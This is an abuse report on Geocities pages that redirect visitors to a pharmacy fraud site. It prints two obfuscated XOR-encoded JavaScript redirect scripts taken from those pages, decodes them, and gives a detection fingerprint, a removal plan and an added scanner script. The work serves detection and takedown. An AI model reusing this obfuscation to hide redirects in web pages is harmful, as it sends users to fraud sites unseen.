Spam Alert Full Report: /Geocities_redirect_spam174335.html
Consumed following related reports:
[174336] http://geocities.com/dirkgill96/
Changed status to confirmed spam.
Two examples of Yahoo Geocities redirections to a Canadian Pharmacy fraud site. This report contains
(1) and (2) the sample redirection scripts from the sites and the decoding of those scripts,
(3) the generic fingerprint that identifies these malicious redirections,
(4) the method to rid Geocities of this huge infection, which is occurring at an abuse rate of 800 per day, as seen at http://rss.uribl.com/hosters/geocities_com.html
(1) Sample redirection script for "dirkgill96"
var epoa='cqcxsnkyjlbtyfinwycuvgl';
var zxry=0;
var gzqsflk, rknmly, fiaknnc='5F02000A1A1E1F59060D0C130C070E0B4A5B291400063F00030A08074C550E0302061B0E481D0107570F1A1506180A1E0D561B1C0E1F4A51425311121D1E4D564C101715180B141B19101A451A0501454F45491A0D0510130148';
rknmly='';
var gzyw;
for( gzqsflk=0; gzqsflk < fiaknnc.length; gzqsflk+=2){gzyw = unescape( '%' + fiaknnc.substr( gzqsflk,2));
rknmly += String.fromCharCode( gzyw.charCodeAt(0) ^ epoa.charCodeAt(zxry++) );
if ( zxry >= epoa.length ) zxry = 0;
}document.write(rknmly);
Decodes to
<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>
(2) Sample redirection script for "franciscopark37"
var punwiu='cqapugtvldb';
var zozdjs=0;
var tfbkr, yhwxje, lybn='5F0202021C17005600050C04040017105A563C0D120330121319051356481B0D0C071E165E01080458000B010205081F1B491C040902425E5146180113044C434B0702031518101F1515184A010C1C464B494807151E0D12174F';
yhwxje='';
var dtem;
for( tfbkr=0; tfbkr < lybn.length; tfbkr+=2){dtem = unescape( '%' + lybn.substr( tfbkr,2));
yhwxje += String.fromCharCode( dtem.charCodeAt(0) ^ punwiu.charCodeAt(zozdjs++) );
if ( zozdjs >= punwiu.length ) zozdjs = 0;
}document.write(yhwxje);
Decodes to
<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>
(3) Generic fingerprint for redirection scripts starts with
var {TS}='{TSLONG}';var {TS}=0;var {TS}, {TS}, {TS}='{HEX}';{TS}='';var {TS};for( {TS}=0;{TS} < {TS}.length;{TS}+=2){{TS} = unescape( '%' + {TS}.substr( {TS},2));
where {TS} is a variable lower case text string of 3 - 9 characters
and {TSLONG} is a longer lower case text string 5 - 40 characters
and {HEX} is a long hexadecimal character string comprising the set 0-9, A-F
(4) Using this generic fingerprint, scan every Geocities page, and remove every page that matches. Keep running the scan and removal until the abuse ceases. Monitor for changes in the fingerprint and adjust accordingly.
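One way to run the scan in (4), given here as an added example that is not part of the original report: the fingerprint from (3) is compiled into a regular expression, and a matching script is decoded statically (never executed) to recover where it redirects. The function names, the whitespace-tolerant matching and the sample script with its `example.invalid` payload are constructed for illustration.

```javascript
// Fingerprint text from section (3) of the report.
const TEMPLATE = "var {TS}='{TSLONG}';var {TS}=0;var {TS}, {TS}, {TS}='{HEX}';" +
  "{TS}='';var {TS};for( {TS}=0;{TS} < {TS}.length;{TS}+=2)" +
  "{{TS} = unescape( '%' + {TS}.substr( {TS},2));";
const PLACEHOLDERS = {
  '{TS}': '[a-z]{3,9}',
  '{TSLONG}': '([a-z]{5,40})',       // capture 1: XOR key
  '{HEX}': '((?:[0-9A-F]{2})+)',     // capture 2: hex-encoded payload
};

// Tokens are joined with \s* so re-wrapped or re-spaced copies still match
// (this looseness is an assumption, not part of the report's fingerprint).
function compileFingerprint(template) {
  const tokens = template.match(/\{TSLONG\}|\{TS\}|\{HEX\}|\w+|\S/g);
  return new RegExp(tokens.map(t =>
    PLACEHOLDERS[t] || t.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')).join('\\s*'));
}
const FINGERPRINT = compileFingerprint(TEMPLATE);

// Same arithmetic as the scripts' loop: each hex byte XOR the repeating key.
function xorDecode(hex, key) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    const byte = parseInt(hex.substr(i, 2), 16);
    out += String.fromCharCode(byte ^ key.charCodeAt((i / 2) % key.length));
  }
  return out;
}

// Report whether a page matches, what it decodes to, and any navigation target.
function analyzePage(html) {
  const m = FINGERPRINT.exec(html);
  if (!m) return { match: false, decoded: null, target: null };
  const decoded = xorDecode(m[2], m[1]);
  const nav = /location(?:\.href)?\s*=\s*'([^']*)'/.exec(decoded);
  return { match: true, decoded, target: nav ? nav[1] : null };
}

// Constructed sample (not taken from a real page): same script shape,
// key 'bench', payload pointing at a reserved .invalid host.
const SAMPLE = [
  "var abcd='bench';", "var efgh=0;",
  "var ijkl, mnop, qrst='0E0A0D021C0B0A004D001000085E4F0A111A1352" +
    "4D4A0B1B090F150206460B0B1802040B0149';",
  "mnop='';", "var uvwx;", "for( ijkl=0;", "ijkl < qrst.length;",
  "ijkl+=2){uvwx = unescape( '%' + qrst.substr( ijkl,2));",
].join('\n');
console.log(analyzePage(SAMPLE));
```

Recording the decoded target for each hit also helps with the monitoring step: a page that stops matching the fingerprint but still resolves to an already-seen target indicates the script format has changed.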
NOTE: This is a pervasive problem with serious consequences for Yahoo's reputation and integrity.
Escalate this issue immediately to the Corporate Security level for implementation.
Quote: http://geocities.com/franciscopark37/